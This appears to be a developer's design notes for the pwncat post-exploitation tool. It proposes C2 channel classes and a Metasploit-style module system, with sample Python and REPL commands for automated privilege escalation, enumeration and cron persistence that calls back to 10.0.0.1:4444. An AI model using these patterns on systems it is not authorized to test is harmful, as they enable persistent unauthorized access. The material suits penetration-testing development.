I plan to eventually momve all persistence, escalation and enumeration modules into the new `/pwncat/modules` structure. This allows individual modules to be used alone and allows complex modules custom arguments.
4.5 KiB
Feature and Changes Ideas
I'm just rambling some ideas I have here.
C2 Channels
I think it could be helpful to establish an abstract C2 channel class
to allow pwncat to communicate over different C2 methods. For example,
Bind
and Reverse
channel classes could handle the standard bind and
reverse methods. An SSH
channel could handle SSH connections.
There is also potential for numerous other methods such as DNS, ICMP, etc. A Channel class would look a lot like a socket, but would guarantee a consistent interface across C2 types.
Module access
Modules are currently segmented by type. There are persistence, privilege escalation, and enumeration modules. These modules are all implemented independently and accessed through separate commands.
This is helpful for segmenting the different parts of pwncat into different base goals, but hinders the ease of development for new modules. This interface does not provide a simple way for complex modules to accept parameters and forces the developer to remember the interface for all of these different command frameworks.
I was initially hesitant to adopt the Metasploit Framework way of doing things where every action was a module, because I wanted to keep things simpler, but as the framework grows and more complex modules are implemented, I think this is needed, but needs to be implemented in such a way that the modules can be interfaced with programmatically as well.
I'm thinking of something like this from a programmatic standpoint:
# Attempt all privileg escalation modules
for module in pwncat.modules.match(r"escalate/.*"):
try:
module.run(target=user)
break
except PrivescError:
pass
# Collect facts from all enumeration modules
facts = []
for module in pwncat.modules.match(r"enumerate/.*"):
facts.extend(module.run())
# Install persistence
pwncat.modules.match(r"persist/.*").run(
user = "root",
lhost = "10.0.0.1",
lport = "4444",
)
A module may look something like this:
class Module(BaseModule):
ARGUMENTS = {
"user": { "type": str, "default": None },
"lhost": { "type": ipaddress.ip_address },
"lport": { "type": int, "default": 4444 }
}
def run(self, user, lhost, lport):
""" Install this persistence method """
return
From a REPL point of view, it would look a lot like metasploit. You can
use
a module. After using a module, any set
actions would set
configurations for this specific module. If you do not have a module
loaded, then using set
will set the configuration globally. If a
configuration is not set locally when run
is executed, then the global
configuration will be checked for matching arguments for the module.
# Install a persistence mthod with a bind channel
use persistence/system/cron
set method channels/bind
set schedule "* * */1 *"
set lhost 10.0.0.1
set lport 4444
run
# Same as above
run persistence/system/cron method=channels/bind lhost=10.0.0.1 lport=4444
# Set a global configuration, applies to all modules
set -g lhost 10.0.0.1
The above programmatic interface could be used to implement the same automated escalation features we had before.
attempted_modules = []
attempted_users = []
for module in pwncat.modules.match("escalate/.*"):
if module in attempted_modules:
continue
try:
module.run(
user=target_user,
ignore_users=attempted_users,
ignore_modules=[m.name for m in attempted_modules]
)
except PrivescFailed as exc:
attempted_modules.extend(exc.attempted_modules)
attempted_users.extend(exc.attempted_users)
The escalate
modules would be created separately from others. They
would inherit from a EscalationModule
class, which provides a
standard interface to the run
method. The subclasses would be
responsible for similar enumerate
, escalate
, write
and read
methods that are currently implemented.
This allows an individual privilege escalation method to be run like this:
run escalate/sudo user=admin
While the standard automated privilege escalation can be accomplished with a simple:
use escalate
set user admin
set ignore_module ["sudo"]
run
# Or completely automated for root
run escalate
Enumerate possibly valid escalation methods
# List possibly valid escalation methods to user admin
run escalate/list user=admin
# List possibly valid escalation methods, ignoring the given modules
run escalate/list ignore_module=["sudo"]